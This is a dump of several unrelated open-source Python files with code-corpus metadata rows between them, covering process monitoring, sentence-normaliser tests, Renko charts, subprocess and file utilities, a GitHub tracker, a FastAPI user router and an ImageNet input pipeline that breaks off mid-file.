# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============LICENSE_END=========================================================
#
# ECOMP is a trademark and service mark of AT&T Intellectual Property.
"""generic class to keep get real time info about the current process"""
import gc
import sys
import threading
import traceback
from functools import wraps
import psutil
def safe_operation(func):
"""safequard the function against any exception"""
if not func:
return
@wraps(func)
def wrapper(*args, **kwargs):
"""wrapper around the function"""
try:
return func(*args, **kwargs)
except Exception as ex:
return {type(ex).__name__ : str(ex)}
return wrapper
class ProcessInfo(object):
"""static class to calculate process info"""
_BIBYTES_SYMBOLS = ('KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB')
_BIBYTES_VALS = {}
_inited = False
_lock = threading.Lock()
@staticmethod
def init():
"""init static constants"""
if ProcessInfo._inited:
return
with ProcessInfo._lock:
if ProcessInfo._inited:
return
for i, bibytes_symbol in enumerate(ProcessInfo._BIBYTES_SYMBOLS):
ProcessInfo._BIBYTES_VALS[bibytes_symbol] = 1 << (i + 1) * 10
ProcessInfo._BIBYTES_SYMBOLS = list(reversed(ProcessInfo._BIBYTES_SYMBOLS))
ProcessInfo._inited = True
@staticmethod
def bytes_to_bibytes(byte_count):
"""converts byte count to human value in kibi-mebi-gibi-...-bytes"""
if byte_count is None:
return "unknown"
if not byte_count or not isinstance(byte_count, int):
return byte_count
ProcessInfo.init()
for bibytes_symbol in ProcessInfo._BIBYTES_SYMBOLS:
bibytes_value = ProcessInfo._BIBYTES_VALS[bibytes_symbol]
if byte_count >= bibytes_value:
value = float(byte_count) / bibytes_value
return '%.2f %s' % (value, bibytes_symbol)
return "%s B" % byte_count
@staticmethod
@safe_operation
def process_memory():
"""calculates the memory usage of the current process"""
process = psutil.Process()
with process.oneshot():
return dict((k, ProcessInfo.bytes_to_bibytes(v))
for k, v in process.memory_full_info()._asdict().items())
@staticmethod
@safe_operation
def virtual_memory():
"""calculates the virtual memory usage of the whole vm"""
return dict((k, ProcessInfo.bytes_to_bibytes(v))
for k, v in psutil.virtual_memory()._asdict().items())
@staticmethod
@safe_operation
def active_threads():
"""list of active threads"""
return sorted([thr.name + "(" + str(thr.ident) + ")" for thr in threading.enumerate()])
@staticmethod
@safe_operation
def thread_stacks():
"""returns the current threads with their stack"""
thread_names = dict((thr.ident, thr.name) for thr in threading.enumerate())
return [
{
"thread_id" : thread_id,
"thread_name" : thread_names.get(thread_id),
"thread_stack" : [
{
"filename" : filename,
"lineno" : lineno,
"function" : function_name,
"line" : line.strip() if line else None
}
for filename, lineno, function_name, line in traceback.extract_stack(stack)
]
}
for thread_id, stack in sys._current_frames().items()
]
@staticmethod
@safe_operation
def gc_info(full=False):
"""gets info from garbage collector"""
gc_info = {
"gc_count" : str(gc.get_count()),
"gc_threshold" : str(gc.get_threshold())
}
if gc.garbage:
gc_info["gc_garbage"] = ([repr(stuck) for stuck in gc.garbage]
if full else len(gc.garbage))
return gc_info
@staticmethod
def get_all():
"""all info"""
return {
"active_threads" : ProcessInfo.active_threads(),
"gc" : ProcessInfo.gc_info(full=True),
"process_memory" : ProcessInfo.process_memory(),
"virtual_memory" : ProcessInfo.virtual_memory(),
"thread_stacks" : ProcessInfo.thread_stacks()
}
| 34.54902
| 95
| 0.573023
| 3,810
| 0.720772
| 0
| 0
| 3,754
| 0.710178
| 0
| 0
| 1,702
| 0.321983
|
a22d14123c5934e462a7334c1d55b574adf6c9be
| 3,403
|
py
|
Python
|
10-19/14. normalize_sentences/test_normalize_sentences.py
|
dcragusa/PythonMorsels
|
5f75b51a68769036e4004e9ccdada6b220124ab6
|
[
"MIT"
] | 1
|
2021-11-30T05:03:24.000Z
|
2021-11-30T05:03:24.000Z
|
10-19/14. normalize_sentences/test_normalize_sentences.py
|
dcragusa/PythonMorsels
|
5f75b51a68769036e4004e9ccdada6b220124ab6
|
[
"MIT"
] | null | null | null |
10-19/14. normalize_sentences/test_normalize_sentences.py
|
dcragusa/PythonMorsels
|
5f75b51a68769036e4004e9ccdada6b220124ab6
|
[
"MIT"
] | 2
|
2021-04-18T05:26:43.000Z
|
2021-11-28T18:46:43.000Z
|
import unittest
from textwrap import dedent
from normalize_sentences import normalize_sentences
class NormalizeSentencesTests(unittest.TestCase):
"""Tests for normalize_sentences."""
maxDiff = 1000
def test_no_sentences(self):
sentence = "This isn't a sentence"
self.assertEqual(normalize_sentences(sentence), sentence)
def test_one_sentence(self):
sentence = "This is a sentence."
self.assertEqual(normalize_sentences(sentence), sentence)
def test_two_sentences(self):
sentences = ["Sentence 1.", "Sentence 2."]
self.assertEqual(
normalize_sentences(" ".join(sentences)),
" ".join(sentences),
)
def test_multiple_punctuation_marks(self):
sentences = ["Sentence 1!", "Sentence 2?", "Sentence 3."]
self.assertEqual(
normalize_sentences(" ".join(sentences)),
" ".join(sentences),
)
def test_multiple_paragraphs(self):
sentences = dedent("""
This is a paragraph. With two sentences in it.
And this is one. With three. Three short sentences.
""").strip()
expected = dedent("""
This is a paragraph. With two sentences in it.
And this is one. With three. Three short sentences.
""").strip()
self.assertEqual(
normalize_sentences(sentences),
expected,
)
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_no_extra_spaces(self):
sentences = """
Sentence 1. And two spaces after. But one space after this.
"""
expected = """
Sentence 1. And two spaces after. But one space after this.
"""
self.assertEqual(
normalize_sentences(sentences),
expected,
)
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_with_abbreviations_and_numbers(self):
sentences = "P.S. I like fish (e.g. salmon). That is all."
expected = "P.S. I like fish (e.g. salmon). That is all."
self.assertEqual(
normalize_sentences(sentences),
expected,
)
sentences = "I ate 5.5 oranges. They cost $.50 each. They were good."
expected = "I ate 5.5 oranges. They cost $.50 each. They were good."
self.assertEqual(
normalize_sentences(sentences),
expected,
)
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_excluded_words_work(self):
sentences = (
"Do you know about the work of Dr. Rosalind Franklin? You can "
"find out what she did by using google.com. Google is used by "
"1.17 billion people (as of December 2012). That's a lot people!"
)
expected = (
"Do you know about the work of Dr. Rosalind Franklin? You can "
"find out what she did by using google.com. Google is used by "
"1.17 billion people (as of December 2012). That's a lot people!"
)
self.assertEqual(
normalize_sentences(sentences),
expected,
)
if __name__ == "__main__":
unittest.main(verbosity=2)
| 33.362745
| 78
| 0.601234
| 3,243
| 0.952983
| 0
| 0
| 0
| 0
| 0
| 0
| 1,521
| 0.446959
|
a22d9fe19ea5e2d8a40235675b25713b84b3f165
| 2,673
|
py
|
Python
|
graph/renkolib.py
|
kUNWAR-DIVYANSHU/stockui
|
f85a26b461512fefd33a4f2acfa30d178de3d118
|
[
"MIT"
] | 2
|
2021-08-28T20:37:01.000Z
|
2021-08-30T12:01:33.000Z
|
graph/renkolib.py
|
kUNWAR-DIVYANSHU/stockui
|
f85a26b461512fefd33a4f2acfa30d178de3d118
|
[
"MIT"
] | null | null | null |
graph/renkolib.py
|
kUNWAR-DIVYANSHU/stockui
|
f85a26b461512fefd33a4f2acfa30d178de3d118
|
[
"MIT"
] | null | null | null |
import atrlib
import pandas as pd
# module for calculation of data for renko graph
def renko(df):
d , l , h ,lbo ,lbc,vol=[],[],[],[],[],[]
brick_size = atrlib.brick_size(df)
volume = 0.0
for i in range(0,len(df)):
if i==0:
if(df['close'][i]>df['open'][i]):
d.append(df['date'][i])
l.append(df['open'][i])
h.append(df["close"][i])
lbo.append(df["open"][i])
lbc.append(df["close"][i])
vol.append(df['volume'][i])
else:
d.append(df['date'][i])
l.append(df['close'][i])
h.append(df["open"][i])
lbo.append(df["open"][i])
lbc.append(df["close"][i])
vol.append(df['volume'][i])
else:
volume += df["volume"][i]
leng = len(lbo)
if(lbc[leng-1]>lbo[leng-1]):
if(df["close"][i]>=(lbc[leng-1]+brick_size)):
lbc.append((lbc[leng-1]+brick_size))
lbo.append(lbc[leng-1])
l.append(lbc[leng-1])
h.append((lbc[leng-1]+brick_size))
d.append(df["date"][i])
vol.append(volume)
volume = 0.0
elif(df["close"][i]<=(lbo[leng-1]-brick_size)):
lbc.append((lbo[leng-1]-brick_size))
lbo.append(lbo[leng-1])
h.append(lbo[leng-1])
l.append((lbo[leng-1]-brick_size))
d.append(df["date"][i])
vol.append(volume)
volume = 0.0
else:
if(df["close"][i]>=(lbo[leng-1]+brick_size)):
lbc.append((lbo[leng-1]+brick_size))
lbo.append(lbo[leng-1])
l.append(lbo[leng-1])
h.append((lbo[leng-1]+brick_size))
d.append(df["date"][i])
vol.append(volume)
volume = 0.0
elif(df["close"][i]<=(lbc[leng-1]-brick_size)):
lbc.append((lbc[leng-1]-brick_size))
lbo.append(lbc[leng-1])
h.append(lbc[leng-1])
l.append((lbc[leng-1]-brick_size))
d.append(df["date"][i])
vol.append(volume)
volume = 0.0
data_ = pd.DataFrame(d,columns=["date"])
data_["open"] = lbo
data_["close"] =lbc
data_["low"] = l
data_["high"] = h
data_['volume']=vol
return data_
| 37.647887
| 63
| 0.412645
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 239
| 0.089413
|
a22ef44872867d8b0cd94176f76c246bfbaa7a25
| 2,846
|
py
|
Python
|
utils/utils.py
|
SoliareofAstora/Metagenomic-DeepFRI
|
7ee12c5bc34f9103f113e93f570719686f856372
|
[
"BSD-3-Clause"
] | null | null | null |
utils/utils.py
|
SoliareofAstora/Metagenomic-DeepFRI
|
7ee12c5bc34f9103f113e93f570719686f856372
|
[
"BSD-3-Clause"
] | null | null | null |
utils/utils.py
|
SoliareofAstora/Metagenomic-DeepFRI
|
7ee12c5bc34f9103f113e93f570719686f856372
|
[
"BSD-3-Clause"
] | 1
|
2022-01-12T10:41:51.000Z
|
2022-01-12T10:41:51.000Z
|
import os
import pathlib
import requests
import shutil
import subprocess
import time
ENV_PATHS = set()
def add_path_to_env(path):
ENV_PATHS.add(path)
def run_command(command, timeout=-1):
if type(command) == str:
command = str.split(command, ' ')
my_env = os.environ.copy()
my_env["PATH"] += ":"+str.join(":", ENV_PATHS)
try:
if timeout > 0:
completed_process = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=my_env, timeout=timeout)
else:
completed_process = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=my_env)
except subprocess.TimeoutExpired:
raise TimeoutError(f"command {' '.join(command)} timeout")
if completed_process.stderr != b'':
error_info = completed_process.stderr.decode()
raise RuntimeError(f"during execution: {' '.join(command)} exception occurred\n{error_info}")
else:
return completed_process.stdout.decode('utf-8')
def search_files_in_paths(paths: list, pattern: str):
files = []
for path in paths:
if not path.exists():
print(f"Unable to locate {path}.")
continue
if path.is_dir():
files.extend(list(path.glob("**/*"+pattern)))
else:
if not path.name.endswith(pattern):
print(f"{path} is not an {pattern} file which is excepted format.")
else:
files.append(path)
return files
def download_file(url, path):
with requests.get(url, stream=True) as r:
with open(path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
def chunks(lst, n):
if n == 1:
return [lst]
output = []
for i in range(n):
output.append(lst[i::n])
return output
def create_unix_timestamp_folder(parent_path):
parent_path = pathlib.Path(parent_path)
start = str(time.time())
path = (parent_path / start)
while path.exists():
time.sleep(1)
start = str(time.time())
path = (parent_path / start)
path.mkdir(parents=True)
return path
def merge_files_binary(file_paths: list, output_path: pathlib.Path):
with open(output_path, 'wb') as writer:
for input_file in file_paths:
with open(input_file, 'rb') as reader:
shutil.copyfileobj(reader, writer)
def parse_input_paths(input_list, project_name, parent_directory):
if input_list is None:
input_paths = [pathlib.Path(parent_directory / project_name)]
else:
input_paths = []
for input_path in [pathlib.Path(x) for x in input_list]:
if input_path.is_absolute():
input_paths.append(input_path)
else:
input_paths.append(parent_directory / input_path)
return input_paths
| 28.747475
| 132
| 0.627899
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 241
| 0.08468
|
a22fe2112341437f4d8c36db1b3319ad00230552
| 2,274
|
py
|
Python
|
fuzzinator/tracker/github_tracker.py
|
akosthekiss/fuzzinator
|
194e199bb0efea26b857ad05f381f72e7a9b8f66
|
[
"BSD-3-Clause"
] | null | null | null |
fuzzinator/tracker/github_tracker.py
|
akosthekiss/fuzzinator
|
194e199bb0efea26b857ad05f381f72e7a9b8f66
|
[
"BSD-3-Clause"
] | null | null | null |
fuzzinator/tracker/github_tracker.py
|
akosthekiss/fuzzinator
|
194e199bb0efea26b857ad05f381f72e7a9b8f66
|
[
"BSD-3-Clause"
] | 1
|
2018-06-28T05:21:21.000Z
|
2018-06-28T05:21:21.000Z
|
# Copyright (c) 2016-2022 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
try:
# FIXME: very nasty, but a recent PyGithub version began to depend on
# pycrypto transitively, which is a PITA on Windows (can easily fail with an
# ``ImportError: No module named 'winrandom'``) -- so, we just don't care
# for now if we cannot load the github module at all. This workaround just
# postpones the error to the point when ``GithubTracker`` is actually used,
# so be warned, don't do that on Windows!
from github import Github, GithubException
except ImportError:
pass
from .tracker import Tracker, TrackerError
class GithubTracker(Tracker):
"""
GitHub_ issue tracker.
.. _GitHub: https://github.com/
**Mandatory parameter of the issue tracker:**
- ``repository``: repository name in user/repo format.
**Optional parameter of the issue tracker:**
- ``token``: a personal access token for authenticating.
**Example configuration snippet:**
.. code-block:: ini
[sut.foo]
tracker=fuzzinator.tracker.GithubTracker
[sut.foo.tracker]
repository=alice/foo
token=1234567890123456789012345678901234567890
"""
def __init__(self, *, repository, token=None):
self.repository = repository
self.ghapi = Github(login_or_token=token)
self.project = self.ghapi.get_repo(repository)
def find_duplicates(self, *, title):
try:
issues = list(self.ghapi.search_issues('repo:{repository} is:issue is:open {title}'.format(repository=self.repository, title=title)))
return [(issue.html_url, issue.title) for issue in issues]
except GithubException as e:
raise TrackerError('Finding possible duplicates failed') from e
def report_issue(self, *, title, body):
try:
new_issue = self.project.create_issue(title=title, body=body)
return new_issue.html_url
except GithubException as e:
raise TrackerError('Issue reporting failed') from e
| 34.454545
| 145
| 0.670624
| 1,454
| 0.639402
| 0
| 0
| 0
| 0
| 0
| 0
| 1,329
| 0.584433
|
a2315dd43508aee4e316bc2ccbff15322163a590
| 2,624
|
py
|
Python
|
qmdz_const.py
|
cygnushan/measurement
|
644e8b698faf50dcc86d88834675d6adf1281b10
|
[
"MIT"
] | 1
|
2022-03-18T18:38:02.000Z
|
2022-03-18T18:38:02.000Z
|
qmdz_const.py
|
cygnushan/measurement
|
644e8b698faf50dcc86d88834675d6adf1281b10
|
[
"MIT"
] | null | null | null |
qmdz_const.py
|
cygnushan/measurement
|
644e8b698faf50dcc86d88834675d6adf1281b10
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
import os
from init_op import read_config
# ROOT_PATH = os.path.split(os.path.realpath(__file__))[0]
if getattr(sys, 'frozen', None):
ROOT_DIR = os.path.dirname(sys.executable)
else:
ROOT_DIR = os.path.dirname(__file__)
VI_CONF_PATH = ROOT_DIR + "\conf\VI_CONF.ini"
ST_CONF_PATH = ROOT_DIR + "\conf\ST_CONF.ini"
SC_CONF_PATH = ROOT_DIR + "\conf\SC_CONF.ini"
SYS_CONF_PATH = ROOT_DIR + "\conf\SYS_CONF.ini"
vrange_dict = {0:"AUTO", 1:"1e-6", 2:"10e-6", 3:"100e-6",4:"1e-3", 5:"10e-3",
6:"100e-3", 7:"1", 8:"10", 9:"210"}
irange_dict= {0:"AUTO", 1:"10e-9", 2:"100e-9", 3:"1e-6", 4:"10e-6", 5:"100e-6",
6:"1e-3", 7:"10e-3", 8:"100e-3", 9:"1"}
gas_coef = {0:1.000, 1:1.400, 2:0.446, 3:0.785, 4:0.515, 5:0.610, 6:0.500,
7:0.250, 8:0.410, 9:0.350, 10:0.300, 11:0.250, 12:0.260, 13:1.000,
14:0.740, 15:0.790, 16:1.010, 17:1.000, 18:1.400, 19:1.400, 20:1.000,
21:0.510, 22:0.990, 23:0.710, 24:1.400, 25:0.985, 26:0.630, 27:0.280,
28:0.620, 29:1.360}
res_range = {0:"100", 1:"1e3", 2:"10e3", 3:"100e3", 4:"1e6", 5:"10e6", 6:"100e6", 7:"200e6"}
res_det = 0
VI_ILIST = []
IV_VLIST = []
VI_GAS = []
ST_GAS_AUTO = [0,0,0,0,0,0,0,0]
ST_GAS_MODE = 0 # 0:自动控制 1:手动
SC_GAS_MODE = 0 # 0:自动控制 1:手动
SC_FLOW1 = []
SC_FLOW2 = []
SC_FLOW3 = []
SC_GAS_PARA = []
hold_time = 60
low_offset = 0.2
high_offset = 1
up_slot = 1
down_slot = 1
critical_temp = 500
measure_times = 1
temp_list = []
Auto_Range = 1
# 2400设置全局变量
MEAS_MODE = 0 #0:2线制,1:4线制
OUTPUT_MODE = 0 # 0:脉冲输出,1:连续输出
VI_MODE = 1
# 测试时间段
TIME_t1 = 0
TIME_t2 = 0
TIME_t3 = 0
TIME_t4 = 0
TIME_SUM = 0
#[流量计1状态,流量值1,流量计2状态,流量值2,流量计3状态,流量值3,空气状态,空气流量值,]
t1_gas = []
t2_gas = []
t3_gas = []
t4_gas = []
flowmeter1_state = 0
flowmeter2_state = 0
flowmeter3_state = 0
airpump_state = 0
color_list = ["Aqua","Black","Fuchsia","Gray","Green","Lime","Maroon","Navy",
"Red","Silver","Teal","Yellow","Blue","Olive","Purple","White"]
PARA_NAME = ['SteP','HIAL','LoAL','HdAL','LdAL','AHYS','CtrL','M5',
'P','t','CtI','InP','dPt','SCL','SCH','AOP',
'Scb','OPt','OPL','OPH','AF','RUNSTA','Addr','FILt',
'AmAn','Loc','c01','t01','c02','t02', 'c03','t03']
PARA_DEFAULT = [1,8000,-1960,9999,9999,2,3,50,65,20,2,0,1,0,
5000,5543,0,0,0,100,6,12,1,10,27,808]
def get_range(key):
key_value = read_config(SYS_CONF_PATH, 'HMTS48', key)
return key_value
flow1_range = int(get_range('flow1_range'))
flow2_range = int(get_range('flow2_range'))
flow3_range = int(get_range('flow3_range'))
| 24.523364
| 92
| 0.596418
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 950
| 0.341236
|
a231a6c5e1e9bfd374c54640c8a12d24c01e3857
| 93
|
py
|
Python
|
lattedb/linksmear/apps.py
|
callat-qcd/lattedb
|
75c06748f3d59332a84ec1b5794c215c5974a46f
|
[
"BSD-3-Clause"
] | 1
|
2019-12-11T02:33:23.000Z
|
2019-12-11T02:33:23.000Z
|
lattedb/linksmear/apps.py
|
callat-qcd/lattedb
|
75c06748f3d59332a84ec1b5794c215c5974a46f
|
[
"BSD-3-Clause"
] | 10
|
2020-01-29T17:06:01.000Z
|
2021-05-31T14:41:19.000Z
|
lattedb/linksmear/apps.py
|
callat-qcd/lattedb
|
75c06748f3d59332a84ec1b5794c215c5974a46f
|
[
"BSD-3-Clause"
] | null | null | null |
from django.apps import AppConfig
class LinkSmearConfig(AppConfig):
name = "linksmear"
| 15.5
| 33
| 0.763441
| 56
| 0.602151
| 0
| 0
| 0
| 0
| 0
| 0
| 11
| 0.11828
|
a232ee55bbdd0227f3c92c01f62af655cba96907
| 2,088
|
py
|
Python
|
project/repository/user.py
|
tobiasaditya/fastapi-blog
|
0f50f4261755f926ce9e951db8237a5f38384dcb
|
[
"MIT"
] | null | null | null |
project/repository/user.py
|
tobiasaditya/fastapi-blog
|
0f50f4261755f926ce9e951db8237a5f38384dcb
|
[
"MIT"
] | null | null | null |
project/repository/user.py
|
tobiasaditya/fastapi-blog
|
0f50f4261755f926ce9e951db8237a5f38384dcb
|
[
"MIT"
] | null | null | null |
from typing import List
from fastapi import APIRouter
from fastapi.params import Depends
from fastapi import HTTPException, status
from sqlalchemy.orm.session import Session
from project import schema, models, database, hashing
router = APIRouter(
prefix="/user",
tags=['Users']
)
@router.post('/new')
def create_user(request:schema.User, db:Session = Depends(database.get_db)):
hashed_pass = hashing.get_password_hash(request.password)
new_user = models.User(name = request.name,username = request.username, password = hashed_pass)
db.add(new_user)
db.commit()
db.refresh(new_user)
return request
@router.get('/find', response_model= List[schema.showUser])
def show_user_all(db:Session=Depends(database.get_db)):
all_users = db.query(models.User).all()
return all_users
@router.get('/find/{id}',response_model= schema.showUser)
def show_user_id(id:int, db:Session = Depends(database.get_db)):
selected_project = db.query(models.User).filter(models.User.id == id).first()
if not selected_project:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,detail=f"User {id} not found.")
return selected_project
# @router.put('/{id}')
# def update_project_id(id:int,request:schema.Project,db:Session = Depends(database.get_db)):
# #Search for projects' id
# selected_project = db.query(models.Project).filter(models.Project.id == id)
# if not selected_project.first():
# raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,detail=f"Project {id} not found.")
# selected_project.update(dict(request))
# return {'status':f'project {id} updated'}
# @router.delete('/{id}')
# def delete_project_id(id:int,db:Session = Depends(database.get_db)):
# selected_project = db.query(models.Project).filter(models.Project.id == id).first()
# if not selected_project:
# raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,detail=f"Project {id} not found.")
# db.delete(selected_project)
# db.commit()
# return {'status':f'delete project_id {id} successful'}
| 33.142857
| 102
| 0.724617
| 0
| 0
| 0
| 0
| 881
| 0.421935
| 0
| 0
| 945
| 0.452586
|
a23471f40d09455ca7a0123fbc08ae7b2e5ada89
| 17,643
|
py
|
Python
|
milking_cowmask/data_sources/imagenet_data_source.py
|
deepneuralmachine/google-research
|
d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231
|
[
"Apache-2.0"
] | 23,901
|
2018-10-04T19:48:53.000Z
|
2022-03-31T21:27:42.000Z
|
milking_cowmask/data_sources/imagenet_data_source.py
|
deepneuralmachine/google-research
|
d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231
|
[
"Apache-2.0"
] | 891
|
2018-11-10T06:16:13.000Z
|
2022-03-31T10:42:34.000Z
|
milking_cowmask/data_sources/imagenet_data_source.py
|
deepneuralmachine/google-research
|
d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231
|
[
"Apache-2.0"
] | 6,047
|
2018-10-12T06:31:02.000Z
|
2022-03-31T13:59:28.000Z
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ImageNet input pipeline.
"""
import os
import pickle
import jax
import numpy as np
import tensorflow.compat.v1 as tf
import tensorflow_datasets as tfds
TRAIN_IMAGES = 1281167
TEST_IMAGES = 50000
MEAN_RGB = [0.485 * 255, 0.456 * 255, 0.406 * 255]
STDDEV_RGB = [0.229 * 255, 0.224 * 255, 0.225 * 255]
def normalize_image(image):
image -= tf.constant(MEAN_RGB, shape=[1, 1, 3], dtype=image.dtype)
image /= tf.constant(STDDEV_RGB, shape=[1, 1, 3], dtype=image.dtype)
return image
def random_crop(image,
min_object_covered=0.1,
aspect_ratio_range=(0.75, 1.33),
area_range=(0.05, 1.0),
max_attempts=100,):
"""Randomly crop an input image.
Args:
image: The image to be cropped.
min_object_covered: The minimal percentage of the target object that should
be in the final crop.
aspect_ratio_range: The cropped area of the image must have an aspect
ratio = width / height within this range.
area_range: The cropped area of the image must contain a fraction of the
input image within this range.
max_attempts: Number of attempts at generating a cropped region of the image
of the specified constraints. After max_attempts failures,
the original image is returned.
Returns:
A random crop of the supplied image.
"""
bbox = tf.constant([0.0, 0.0, 1.0, 1.0], dtype=tf.float32, shape=[1, 1, 4])
sample_distorted_bounding_box = tf.image.sample_distorted_bounding_box(
tf.shape(image),
bounding_boxes=bbox,
min_object_covered=min_object_covered,
aspect_ratio_range=aspect_ratio_range,
area_range=area_range,
max_attempts=max_attempts,
use_image_if_no_bounding_boxes=True)
bbox_begin, bbox_size, _ = sample_distorted_bounding_box
offset_y, offset_x, _ = tf.unstack(bbox_begin)
target_height, target_width, _ = tf.unstack(bbox_size)
crop = tf.image.crop_to_bounding_box(image, offset_y, offset_x,
target_height, target_width)
return crop
def center_crop(image, image_size, crop_padding=32):
"""Crop an image in the center while preserving aspect ratio.
Args:
image: The image to be cropped.
image_size: the desired crop size.
crop_padding: minimal distance of the crop from the edge of the image.
Returns:
The center crop of the provided image.
"""
shape = tf.shape(image)
image_height = shape[0]
image_width = shape[1]
padded_center_crop_size = tf.cast(
((image_size / (image_size + crop_padding)) *
tf.cast(tf.minimum(image_height, image_width), tf.float32)),
tf.int32)
offset_height = ((image_height - padded_center_crop_size) + 1) // 2
offset_width = ((image_width - padded_center_crop_size) + 1) // 2
crop = tf.image.crop_to_bounding_box(image, offset_height, offset_width,
padded_center_crop_size,
padded_center_crop_size)
return crop
def colour_jitter(image, greyscale_prob=0.0):
"""Colour jitter augmentation.
Args:
image: The image to be augmented
greyscale_prob: probability of greyscale conversion
Returns:
Augmented image
"""
# Make sure it has 3 channels so random_saturation and random_hue don't
# fail on greyscale images
image = image * tf.ones([1, 1, 3], dtype=image.dtype)
if greyscale_prob > 0.0:
def f_grey():
return tf.image.rgb_to_grayscale(image)
def f_colour():
image_col = tf.image.random_saturation(image, 0.7, 1.4)
image_col = tf.image.random_hue(image_col, 0.1)
return image_col
p = tf.random.uniform([1])
image = tf.cond(tf.less(p[0], greyscale_prob), f_grey, f_colour)
else:
image = tf.image.random_saturation(image, 0.7, 1.4)
image = tf.image.random_hue(image, 0.1)
image = tf.image.random_contrast(image, 0.7, 1.4)
image = tf.image.random_brightness(image, 0.4)
return image
def preprocess_train_image(image, apply_colour_jitter=False,
greyscale_prob=0.0, image_size=224):
"""Preprocess a raw ImageNet image for training or evaluation.
Args:
image: The image to be preprocessed.
apply_colour_jitter: If True, apply colour jitterring.
greyscale_prob: Probability of converting image to greyscale.
image_size: The target size of the image.
Returns:
The pre-processed image.
"""
image = random_crop(image)
image = tf.image.resize([image],
[image_size, image_size],
method=tf.image.ResizeMethod.BICUBIC
)[0]
# Randomly flip the image horizontally.
image = tf.image.random_flip_left_right(image)
if apply_colour_jitter:
image = colour_jitter(image, greyscale_prob=greyscale_prob)
image = normalize_image(image)
return image
def preprocess_eval_image(image, image_size=224):
"""Preprocess a raw ImageNet image for training or evaluation.
Args:
image: The image to be preprocessed.
image_size: The target size of the image.
Returns:
The pre-processed image.
"""
image = center_crop(image, image_size)
image = tf.image.resize([image],
[image_size, image_size],
method=tf.image.ResizeMethod.BICUBIC
)[0]
image = normalize_image(image)
return image
_JPEG_ENCODED_FEATURE_DESCRIPTION = {
'label': tf.io.FixedLenFeature([], tf.int64, default_value=0),
'image': tf.io.FixedLenFeature([], tf.string),
'file_name': tf.io.FixedLenFeature([], tf.string),
}
def _filter_tfds_by_file_name(in_ds, subset_filenames):
kv_init = tf.lookup.KeyValueTensorInitializer(
np.array(subset_filenames), np.ones((len(subset_filenames),), dtype=int),
key_dtype=tf.string, value_dtype=tf.int64)
ht = tf.lookup.StaticHashTable(kv_init, 0)
def pred_fn(x):
return tf.equal(ht.lookup(x['file_name']), 1)
return in_ds.filter(pred_fn)
def _deserialize_and_decode_jpeg(serialized_sample):
sample = tf.io.parse_single_example(serialized_sample,
_JPEG_ENCODED_FEATURE_DESCRIPTION)
sample['image'] = tf.io.decode_jpeg(sample['image'])
return sample
def _deserialize_sample(serialized_sample):
return tf.io.parse_example(serialized_sample,
_JPEG_ENCODED_FEATURE_DESCRIPTION)
def _decode_jpeg(sample):
image = tf.io.decode_jpeg(sample['image'])
return dict(label=sample['label'], file_name=sample['file_name'], image=image)
def deserialize_and_decode_image_dataset(ds, batch_size):
if batch_size is not None and batch_size > 1:
return ds.batch(batch_size).map(
_deserialize_sample,
num_parallel_calls=tf.data.experimental.AUTOTUNE).unbatch().map(
_decode_jpeg, num_parallel_calls=tf.data.experimental.AUTOTUNE)
else:
return ds.map(_deserialize_and_decode_jpeg,
num_parallel_calls=tf.data.experimental.AUTOTUNE)
def _load_tfds_imagenet(split_name, n_total):
"""Load ImageNet from TFDS."""
split_size = float(n_total) // jax.host_count()
start = split_size * jax.host_id()
end = start + split_size
start_index = int(round(start))
end_index = int(round(end))
split = '{}[{}:{}]'.format(split_name, start_index, end_index)
return tfds.load('imagenet2012:5.*.*', split=split)
def _load_custom_imagenet_split(split_path):
"""Load a custom split of the ImageNet dataset."""
if not tf.io.gfile.exists(split_path):
raise RuntimeError('Cannot find {}'.format(split_path))
shard_filenames = tf.io.gfile.listdir(split_path)
shard_filenames.sort()
if jax.host_count() > 1:
n_hosts = jax.host_count()
host_id = jax.host_id()
shard_filenames = [f for i, f in enumerate(shard_filenames)
if (i % n_hosts) == host_id]
files_in_split = [os.path.join(split_path, f) for f in shard_filenames]
ds = tf.data.TFRecordDataset(files_in_split, buffer_size=128 * 1024 * 1024,
num_parallel_reads=len(files_in_split))
# ds = deserialize_and_decode_image_dataset(ds, batch_size=256)
ds = deserialize_and_decode_image_dataset(ds, batch_size=1)
return ds
_SUP_PATH_PAT = r'{imagenet_subset_dir}/imagenet_{n_sup}_seed{subset_seed}'
_VAL_TVSPLIT_PATH_PAT = r'{imagenet_subset_dir}/imagenet_tv{n_val}s{val_seed}_split.pkl'
_VAL_PATH_PAT = r'{imagenet_subset_dir}/imagenet_tv{n_val}s{val_seed}_val'
